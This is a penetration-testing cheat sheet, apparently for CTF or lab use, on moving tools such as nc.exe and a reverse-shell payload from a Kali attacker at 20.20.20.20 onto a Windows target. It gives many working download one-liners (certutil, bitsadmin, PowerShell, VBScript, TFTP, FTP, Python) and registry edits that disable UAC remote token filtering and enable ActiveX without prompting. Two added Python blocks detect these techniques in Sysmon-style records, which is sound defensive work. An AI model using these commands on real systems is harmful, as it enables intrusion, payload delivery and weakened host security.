Transfer Files - Windows

Replace 20.20.20.20 with the Kali attacker's IP address.
Replace 10.10.10.10 with the Windows target's IP address.

Copy files using smbclient
On Windows, in a cmd.exe running as administrator (or via a UAC bypass exploit), disable remote UAC token filtering so that local administrator accounts receive a full token when connecting over SMB:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

From Kali, use smbclient to list the share names:

root@kali:~/ctf# smbclient -L 10.10.10.10 -U username%password

From Kali, use smbclient to connect to share:

root@kali:~/ctf# smbclient \\\\10.10.10.10\\SomeShare -U username%password

Copy files using mount
On Windows, as in the smbclient section, run the following in a cmd.exe as administrator (or via a UAC bypass exploit) to disable remote UAC token filtering:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

From Kali, connect using mount:

mkdir /media/cifs
mount -t cifs //10.10.10.10/c$ -o username=username,password=password,domain=10.10.10.10 /media/cifs

Copy files via Windows VBScript (.vbs)

Tested on WIN7 SP0. On the Windows machine, create the file wget.vbs one line at a time with echo (the script takes a URL and a destination file name as its two arguments):

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

On the Windows machine, run wget.vbs with cscript to download a file (first argument is the URL, second the destination file):

cscript wget.vbs http://20.20.20.20/putty.exe putty.exe

Copy files via Windows PowerShell

Compatibility: WIN7 SP0+

Any of the following variants works. The first two pass the expression straight to powershell.exe, the third uses -command and additionally disables TLS certificate validation (for a self-signed HTTPS server), and the fourth writes wget.ps1 from cmd with a for loop to avoid nested quoting:

powershell.exe -noninteractive -ExecutionPolicy Bypass -NoLogo -NoProfile (new-object System.Net.WebClient).DownloadFile('http://20.20.20.20/jollyfrogs_443_mtpr__rev_https_x64.exe','jollyfrogs_443_mtpr__rev_https_x64.exe')
powershell.exe -noninteractive -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile (new-object System.Net.WebClient).DownloadFile('http://20.20.20.20/putty.exe','%TEMP%\putty.exe')
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://20.20.20.20/putty.exe"""; $destination="""%TEMP%\putty.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"
(for %t in ("$storageDir = $pwd" "$webclient = New-Object System.Net.WebClient" "$url = "http://20.20.20.20/putty.exe"" "$file = "putty.exe"" "$webclient.DownloadFile($url,$file)") do @echo %~t) >wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Copy files via Windows BITSadmin

Compatibility: WIN7 SP0+
Requires a web server on 20.20.20.20 that supports HTTP range requests (the Range header), which BITS relies on for its resumable downloads.

bitsadmin /transfer job1 /download /priority high http://20.20.20.20/putty.exe %TEMP%\putty.exe

Copy files via Windows TFTP
Compatibility: VISTA SP0+, WIN7 SP0+, WIN2008 SP0+, WIN10 SP0+

On Kali start a TFTP listener

mkdir /root/tftp && atftpd --daemon --port 69 /root/tftp
cp /usr/share/windows-binaries/nc.exe /root/tftp

On Windows, install the TFTP client:

pkgmgr /iu:"TFTP"

Wait about 30 seconds while the target installs the TFTP client, then run:

tftp -i 20.20.20.20 GET nc.exe

Copy files via Windows FTP
Compatibility: VISTA SP0+, WIN7 SP0+, WIN2008 SP0+, WIN10 SP0+

On Kali, install pure-ftpd:

apt-get update && apt-get install pure-ftpd
groupadd ftpgroup && useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd username -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/ && ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome && chown -R ftpuser:ftpgroup /ftphome/
cp /usr/share/windows-binaries/nc.exe /ftphome && /etc/init.d/pure-ftpd restart

On Windows, transfer the file:

set r=^&echo:
(echo open 20.20.20.20 21%r%ftp%r%bin%r%GET nc.exe%r%bye) > ftp.txt&&ftp -s:ftp.txt

(Enter the set command on its own line: cmd expands %r% when it parses a line, so chaining both commands with && would expand %r% before set has run and the first attempt would write a broken ftp.txt.)

or

(for %t in ("open 20.20.20.20 21" ftp bin "GET nc.exe" bye) do @echo %~t) >ftp.txt&&ftp -s:ftp.txt

Copy files inline via Windows debug.exe
Compatibility: WINXP, WIN2000
Note: Only works on 32-bit (x86) Windows; does not work with newer versions of Windows.
64 KB file size limit: nc.exe will crash if more than 64 KB is copied and pasted.
On Kali, convert the file using exe2hex:

exe2hex -x /usr/share/windows-binaries/nc.exe -b /var/www/html/nc_debug.txt -cc

Copy the contents of nc_debug.txt to the clipboard and paste them into the remote shell; the pasted batch uses debug.exe to reconstruct the .exe.

Copy files via certutil

Compatibility: WINXP+

On Kali, start a simple webserver on port 9999 to serve contents of /usr/share/windows-binaries/:

php -S 0.0.0.0:9999 -t /usr/share/windows-binaries

On Windows:

certutil.exe -urlcache -split -f http://20.20.20.20:9999/nc.exe %TEMP%\nc.exe

Copy files inline via Windows PowerShell
Compatibility: WIN7+, WIN2008R2+
64 KB file size limit: nc.exe will crash if more than 64 KB is copied and pasted.
On Kali, convert the file using exe2hex:

exe2hex -x /usr/share/windows-binaries/nc.exe -p /var/www/html/nc_powershell.txt -cc

Copy the contents of nc_powershell.txt to the clipboard and paste them into the remote shell; the pasted script uses PowerShell.exe to reconstruct the .exe.
Note: This works on x86 and x64 on any Windows version with PowerShell (WIN7+, WIN2K8+).

Copy files using Internet Explorer
Compatibility: WINXP, WIN2000

On Windows, add the attacker IP to Internet Explorer's Intranet security zone (the * value holds the zone number; 1 is Local intranet):

reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v ":Range" /d "20.20.20.20"
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v "*" /t REG_DWORD /d 1

On Windows, set the Intranet zone's ActiveX policies (values 1001, 1004, 1200, 1201 and 1208) to 0, i.e. enabled without prompting, so that PassivEx is auto-loaded:

reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1001" /t REG_DWORD /d 0
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1004" /t REG_DWORD /d 0
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1200" /t REG_DWORD /d 0
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1201" /t REG_DWORD /d 0
reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1208" /t REG_DWORD /d 0

On the Windows target, create a VBScript that invisibly launches Internet Explorer pointed at our web server:

echo CreateObject("Wscript.Shell").Run "iexplore.exe -new http://20.20.20.20:9999/nc.exe", 0, False > temp.vbs

Run the VBScript and delete temp.vbs afterwards:

wscript temp.vbs && del temp.vbs
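
The registry writes above (LocalAccountTokenFilterPolicy in the smbclient and mount sections, and the ZoneMap range and Zones\1 ActiveX values in this section) are exactly what a defender should alert on. Added example, not from the original page: a Python check over constructed Sysmon Event ID 13 (registry value set) records, using Sysmon's real TargetObject/Details field names but made-up values, that flags each of those writes and ignores hardening or unrelated writes.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent, value set) records. The field
# names are Sysmon's; the values mirror the page's reg add commands and are made up.
SAMPLE_EVENTS = [
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy",
     "Details": "DWORD (0x00000001)"},
    {"TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname\:Range",
     "Details": "20.20.20.20"},
    {"TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname\*",
     "Details": "DWORD (0x00000001)"},
    {"TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201",
     "Details": "DWORD (0x00000000)"},
    {"TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201",
     "Details": "DWORD (0x00000003)"},  # 3 = disabled: a hardening change, no finding
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\u\updater.exe"},  # unrelated write, no finding
]

ACTIVEX_VALUES = {"1001", "1004", "1200", "1201", "1208"}  # the IE zone settings the page sets to 0
ZONES = {0: "My Computer", 1: "Local intranet", 2: "Trusted sites", 3: "Internet", 4: "Restricted sites"}

def dword(details):
    """Parse Sysmon's 'DWORD (0x0000000N)' rendering; None for non-DWORD data."""
    m = re.fullmatch(r"DWORD \(0x([0-9A-Fa-f]{8})\)", details)
    return int(m.group(1), 16) if m else None

def assess(event):
    """Return a finding for a registry write that weakens the host, else None."""
    parent, _, value = event["TargetObject"].rpartition("\\")
    data = event["Details"]
    if parent.endswith(r"\Policies\System") and value == "LocalAccountTokenFilterPolicy" and dword(data) == 1:
        return "remote UAC token filtering disabled: local admins get a full token over the network"
    if "\\Internet Settings\\ZoneMap\\Ranges\\" in parent and value == ":Range":
        return f"host {data} added to an IE ZoneMap range"
    if "\\Internet Settings\\ZoneMap\\Ranges\\" in parent and value == "*":
        return f"ZoneMap range assigned to zone {dword(data)} ({ZONES.get(dword(data), '?')})"
    if parent.endswith(r"\Internet Settings\Zones\1") and value in ACTIVEX_VALUES and dword(data) == 0:
        return f"Local intranet ActiveX setting {value} set to 0 (enabled without prompt)"
    return None

def findings(events):
    """Pair each flagged event's registry path with its finding for triage."""
    return [(e["TargetObject"], assess(e)) for e in events if assess(e)]
```

The same checks work on live Sysmon output once the event XML has been flattened into the same two fields.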

Copy files via Python

Note: Only works if Python is installed on Windows (it is not by default).

On Kali, start a simple webserver on port 9999 to serve contents of /usr/share/windows-binaries/:

php -S 0.0.0.0:9999 -t /usr/share/windows-binaries

On Windows, if using Python 2:

python -c "import urllib; urllib.urlretrieve ('http://20.20.20.20:9999/nc_powershell.txt', r'%TEMP%\ps.txt')"

On Windows, if using Python 3:

python -c "import urllib.request; urllib.request.urlretrieve ('http://20.20.20.20:9999/nc.exe', r'%TEMP%\nc.exe')"
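
Every download one-liner on this page (the PowerShell, BITSadmin, VBScript, TFTP, FTP, certutil and Python sections) leaves a distinctive process command line in Sysmon Event ID 1 or Security event 4688. Added example, not from the original page: a Python rule set run over constructed command lines modelled on those sections, which labels the technique, pulls out the remote host or URL for triage, and leaves benign certutil use and unrelated commands alone.

```python
import re

# Constructed process-creation command lines (Sysmon Event ID 1 / Security
# 4688 style); they mirror the page's download one-liners and are not real logs.
SAMPLE_CMDLINES = [
    r"certutil.exe -urlcache -split -f http://20.20.20.20:9999/nc.exe C:\Temp\nc.exe",
    r"bitsadmin /transfer job1 /download /priority high http://20.20.20.20/putty.exe C:\Temp\putty.exe",
    r"powershell.exe -noninteractive -ExecutionPolicy Bypass (new-object System.Net.WebClient).DownloadFile('http://20.20.20.20/putty.exe','putty.exe')",
    r"cscript wget.vbs http://20.20.20.20/putty.exe putty.exe",
    r"tftp -i 20.20.20.20 GET nc.exe",
    r"ftp -s:ftp.txt",
    "python -c \"import urllib.request; urllib.request.urlretrieve('http://20.20.20.20:9999/nc.exe', r'C:\\Temp\\nc.exe')\"",
    r"certutil.exe -verify -urlfetch C:\certs\user.cer",  # legitimate certutil use: must not alert
    r"C:\Program Files\Git\cmd\git.exe fetch origin",    # unrelated: must not alert
]

# One rule per page technique. Each requires the flags that turn the binary
# into a downloader, so ordinary use of certutil, ftp or python is ignored.
RULES = [
    ("certutil urlcache download", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\b", re.I)),
    ("bitsadmin transfer", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*/download\b", re.I)),
    ("PowerShell WebClient download", re.compile(r"\bpowershell(?:\.exe)?\b.*(?:net\.webclient|downloadfile|downloadstring)", re.I)),
    ("script host (.vbs) download", re.compile(r"\b[cw]script(?:\.exe)?\b.*\.vbs\b.*https?://", re.I)),
    ("tftp GET", re.compile(r"\btftp(?:\.exe)?\s+-i\s+\S+\s+get\b", re.I)),
    ("scripted ftp session", re.compile(r"\bftp(?:\.exe)?\s.*-s:\S+", re.I)),
    ("python urlretrieve", re.compile(r"\bpython(?:\d|\.exe)?\b.*urlretrieve", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def classify(cmdline):
    """Return (technique, remote URL or host) for a download command line, else None."""
    for name, rule in RULES:
        if rule.search(cmdline):
            m = URL_RE.search(cmdline) or IPV4_RE.search(cmdline)
            return name, (m.group(0) if m else None)
    return None

def scan(cmdlines):
    """Run every command line through the rules and keep the hits for triage."""
    hits = []
    for c in cmdlines:
        result = classify(c)
        if result:
            hits.append((c,) + result)
    return hits
```

The ftp -s: case yields no remote because the server address lives in the script file, so the file named after -s: is the next artefact to collect.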